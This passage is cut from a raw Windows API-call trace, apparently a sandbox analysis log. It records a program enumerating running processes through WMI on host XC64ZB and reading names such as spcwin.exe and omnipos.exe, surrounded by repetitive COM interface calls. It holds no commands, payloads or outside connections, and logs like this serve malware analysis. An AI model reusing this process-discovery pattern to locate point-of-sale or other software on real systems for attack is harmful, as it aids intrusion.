out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.400] WbemDefPath:IUnknown:AddRef (This=0x552a468) returned 0x3 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55385a8) returned 0x0 [0265.400] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55385a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.400] WbemDefPath:IUnknown:Release (This=0x55385a8) returned 0x3 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.400] WbemDefPath:IUnknown:Release (This=0x552a468) returned 0x2 [0265.400] WbemDefPath:IUnknown:Release (This=0x552a468) returned 0x1 [0265.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a468, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a468) returned 0x0 [0265.401] WbemDefPath:IUnknown:AddRef (This=0x552a468) returned 0x3 [0265.401] WbemDefPath:IUnknown:Release (This=0x552a468) returned 0x2 [0265.401] WbemDefPath:IWbemPath:SetText (This=0x552a468, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4408\"") returned 0x0 [0265.401] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.401] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.401] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.401] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.401] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.401] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.401] IWbemClassObject:Get (in: This=0x553b128, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e8318*=0, plFlavor=0x23e831c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x23e8318*=8, plFlavor=0x23e831c*=0) returned 0x0 [0265.401] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0265.401] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0265.401] IWbemClassObject:Get (in: This=0x553b128, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e8318*=8, plFlavor=0x23e831c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x23e8318*=8, plFlavor=0x23e831c*=0) returned 0x0 [0265.401] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0265.401] SysStringByteLen (bstr="spcwin.exe") returned 0x14 [0265.401] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.401] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5539940, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.402] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5539940) returned 0x0 [0265.402] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.402] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.402] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.403] IUnknown:AddRef (This=0x5539940) returned 0x3 [0265.403] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.403] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.403] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5539944) returned 0x0 [0265.403] IMarshal:GetUnmarshalClass (in: This=0x5539944, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.403] IUnknown:Release (This=0x5539944) returned 0x3 [0265.403] IUnknown:QueryInterface (in: This=0x5539940, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.403] IUnknown:Release (This=0x5539940) returned 0x2 [0265.403] IUnknown:QueryInterface (in: This=0x5539940, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5539940) returned 0x0 [0265.403] IUnknown:AddRef (This=0x5539940) returned 0x4 [0265.403] IUnknown:Release (This=0x5539940) returned 0x3 [0265.403] IUnknown:Release (This=0x5539940) returned 0x2 [0265.403] CoTaskMemFree (pv=0x54ba2d8) [0265.403] IUnknown:AddRef (This=0x5539940) returned 0x3 [0265.403] IWbemClassObject:Get (in: This=0x5539940, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.403] IWbemClassObject:Get (in: This=0x5539940, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4416\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.404] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4416\"") returned 0x5e [0265.404] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4416\"") returned 0x5e [0265.404] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.404] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.404] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.404] IUnknown:Release (This=0x601a94) returned 0x1 [0265.405] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba1d8) returned 0x0 [0265.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba1d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.405] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba1d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529e48) returned 0x0 [0265.405] WbemDefPath:IUnknown:Release (This=0x54ba1d8) returned 0x0 [0265.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529e48) returned 0x0 [0265.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.406] WbemDefPath:IUnknown:AddRef (This=0x5529e48) returned 0x3 [0265.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5536850) returned 0x0 [0265.406] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5536850, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.406] WbemDefPath:IUnknown:Release (This=0x5536850) returned 0x3 [0265.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.406] WbemDefPath:IUnknown:Release (This=0x5529e48) returned 0x2 [0265.406] WbemDefPath:IUnknown:Release (This=0x5529e48) returned 0x1 [0265.406] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529e48, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529e48) returned 0x0 [0265.406] WbemDefPath:IUnknown:AddRef (This=0x5529e48) returned 0x3 [0265.406] WbemDefPath:IUnknown:Release (This=0x5529e48) returned 0x2 [0265.406] WbemDefPath:IWbemPath:SetText (This=0x5529e48, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4416\"") returned 0x0 [0265.406] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.406] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.406] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.406] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.407] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.407] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.407] IWbemClassObject:Get (in: This=0x5539940, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e8ba4*=0, plFlavor=0x23e8ba8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x23e8ba4*=8, plFlavor=0x23e8ba8*=0) returned 0x0 [0265.407] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0265.407] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0265.407] IWbemClassObject:Get (in: This=0x5539940, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e8ba4*=8, plFlavor=0x23e8ba8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="omnipos.exe", varVal2=0x0), pType=0x23e8ba4*=8, plFlavor=0x23e8ba8*=0) returned 0x0 [0265.407] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0265.407] SysStringByteLen (bstr="omnipos.exe") returned 0x16 [0265.407] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.407] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x553a2d0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553a2d0) returned 0x0 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.408] IUnknown:AddRef (This=0x553a2d0) returned 0x3 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.408] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553a2d4) returned 0x0 [0265.408] IMarshal:GetUnmarshalClass (in: This=0x553a2d4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.409] IUnknown:Release (This=0x553a2d4) returned 0x3 [0265.409] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.409] IUnknown:Release (This=0x553a2d0) returned 0x2 [0265.409] IUnknown:QueryInterface (in: This=0x553a2d0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x553a2d0) returned 0x0 [0265.409] IUnknown:AddRef (This=0x553a2d0) returned 0x4 [0265.409] IUnknown:Release (This=0x553a2d0) returned 0x3 [0265.409] IUnknown:Release (This=0x553a2d0) returned 0x2 [0265.409] CoTaskMemFree (pv=0x54ba2d8) [0265.409] IUnknown:AddRef (This=0x553a2d0) returned 0x3 [0265.409] IWbemClassObject:Get (in: This=0x553a2d0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.409] IWbemClassObject:Get (in: This=0x553a2d0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4424\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.409] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4424\"") returned 0x5e [0265.409] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4424\"") returned 0x5e [0265.409] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.409] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.409] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.409] IUnknown:Release (This=0x601a94) returned 0x1 [0265.410] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.411] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529f98) returned 0x0 [0265.411] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, 